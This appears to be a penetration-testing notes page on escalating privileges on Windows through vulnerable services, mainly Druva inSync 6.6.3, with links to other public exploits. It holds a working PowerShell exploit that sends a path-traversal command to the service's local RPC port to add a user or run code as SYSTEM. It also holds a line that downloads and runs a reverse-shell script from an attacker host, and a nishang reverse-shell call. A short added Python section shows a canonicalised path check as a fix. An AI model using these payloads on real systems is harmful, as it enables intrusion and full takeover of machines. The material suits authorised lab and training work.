# Vulnerable Services

## **Enumerating Installed Programs**

```cmd-session
C:\htb> wmic product get name

Name
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4023057)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
VMware Tools
Druva inSync 6.6.3
Microsoft Update Health Tools
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4480730)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
```

{% embed url="https://www.exploit-db.com/exploits/49211" %}

{% embed url="https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" %}

### **Enumerating Local Ports**

```cmd-session
C:\htb> netstat -ano | findstr 6064

  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324
  TCP    127.0.0.1:6064         127.0.0.1:50274        ESTABLISHED     3324
  TCP    127.0.0.1:6064         127.0.0.1:50510        TIME_WAIT       0
  TCP    127.0.0.1:6064         127.0.0.1:50511        TIME_WAIT       0
  TCP    127.0.0.1:50274        127.0.0.1:6064         ESTABLISHED     3860
```

### **Enumerating Process ID**

```powershell-session
PS C:\htb> get-process -Id 3324

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    149      10     1512       6748              3324   0 inSyncCPHwnet64
```

### **Enumerating Running Service**

```powershell-session
PS C:\htb> get-service | ? {$_.DisplayName -like 'Druva*'}

Status   Name               DisplayName
------   ----               -----------
Running  inSyncCPHService   Druva inSync Client Service
```

## BlueHammer — Windows Defender 0-Day Privilege Escalation PoC

{% embed url="https://github.com/Nightmare-Eclipse/BlueHammer" %}

## RedSun - Windows Defender exploitation

{% embed url="https://github.com/Nightmare-Eclipse/RedSun" %}

## Druva inSync Windows Client Local Privilege Escalation Example

### PowerShell PoC

```powershell
$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
```
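The PoC frames each request as a fixed header, a 4-byte RPC type, a 4-byte little-endian length and a UTF-16LE command line whose path steps back out of the inSync directory with `..`. The following added example (not from the page, Druva, or the PoC author) parses that framing the way a service would and shows why a plain prefix check on the requested path accepts the traversal while a canonicalised check rejects it. The frame layout and the trusted base directory `C:\ProgramData\Druva\inSync4` are assumptions inferred from the PoC string, not from Druva's code.

```python
import ntpath
import struct

# Assumptions inferred from the page's PoC (not from Druva documentation):
# frame = 22-byte header | uint32 LE rpc type | uint32 LE byte length | UTF-16LE command line
RPC_HEADER = b"inSync PHC RPCW[v0002]"
ALLOWED_BASE = r"C:\ProgramData\Druva\inSync4"  # directory the service is assumed to trust

def build_frame(rpc_type: int, cmdline: str) -> bytes:
    """Construct a frame in the assumed layout; used only to build sample input."""
    payload = cmdline.encode("utf-16-le")
    return RPC_HEADER + struct.pack("<II", rpc_type, len(payload)) + payload

def parse_rpc_message(data: bytes):
    """Return (rpc_type, command_line) from one frame; reject a bad header or short body."""
    if not data.startswith(RPC_HEADER):
        raise ValueError("bad header")
    body = data[len(RPC_HEADER):]
    rpc_type, length = struct.unpack_from("<II", body, 0)
    payload = body[8:8 + length]
    if len(payload) != length:
        raise ValueError("truncated command")
    return rpc_type, payload.decode("utf-16-le")

def executable_from_command_line(cmdline: str) -> str:
    """Program part of a command line: a quoted path, or the first whitespace-delimited token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(None, 1)[0] if cmdline else ""

def naive_prefix_check(path: str) -> bool:
    """The weak pattern: a string prefix test, which '..' segments pass straight through."""
    return path.lower().startswith(ALLOWED_BASE.lower())

def canonical_check(path: str) -> bool:
    """Hardened: collapse '.', '..' and '/' first, then require the result to sit strictly
    inside ALLOWED_BASE (ntpath applies Windows path rules on any host)."""
    if not ntpath.isabs(path):
        return False
    resolved = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(ALLOWED_BASE))
    return resolved.startswith(base + ntpath.sep)

def should_execute(frame: bytes) -> bool:
    """Decision a fixed service would make for one incoming frame: parse, then canonical check."""
    try:
        _, cmdline = parse_rpc_message(frame)
    except (ValueError, struct.error):
        return False
    return canonical_check(executable_from_command_line(cmdline))
```

The same canonicalise-then-compare rule is what to look for when reviewing any other local RPC service that executes a caller-supplied path.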

#### Reverse shell

{% embed url="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" %}

Rename it to something simple like `shell.ps1` and append the following line at the bottom of the script file:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

Modify the `$cmd` variable so that it downloads and runs the reverse shell:

```powershell
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"
```

<https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-/blob/main/DruvaPE.ps1>

```powershell
$ErrorActionPreference = "Stop"

# Modify the $cmd variable in the Druva inSync exploit PoC script to download our PowerShell reverse shell into memory.
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

# This line belongs at the bottom of shell.ps1 (the nishang script served over HTTP), not in this PoC;
# change the IP and port to match the listener.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

#### Catching a SYSTEM Shell

Execute the PoC PowerShell script on the target host after bypassing the execution policy:

{% content-ref url="/pages/yrRcYBoyWutmbNvRlNZq" %}
[Bypass Powershell Execution Policy](/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy.md)
{% endcontent-ref %}


## SysaxAutomation


{% embed url="https://www.exploit-db.com/exploits/50834" %}

## iTunes - CVE-2024-44193

iTunes version 12.13.2.3

{% embed url="https://github.com/mbog14/CVE-2024-44193" %}

## Teamviewer

{% content-ref url="/pages/17IR6WObDAhId7yjui2U" %}
[TeamViewer](/0xss0rz/pentest/public-exploit/teamviewer.md)
{% endcontent-ref %}

## AnyDesk

Affects versions before v9.0.1.

{% content-ref url="/pages/1dZVU4M55VxNoGMuNMem" %}
[AnyDesk](/0xss0rz/pentest/public-exploit/anydesk.md)
{% endcontent-ref %}
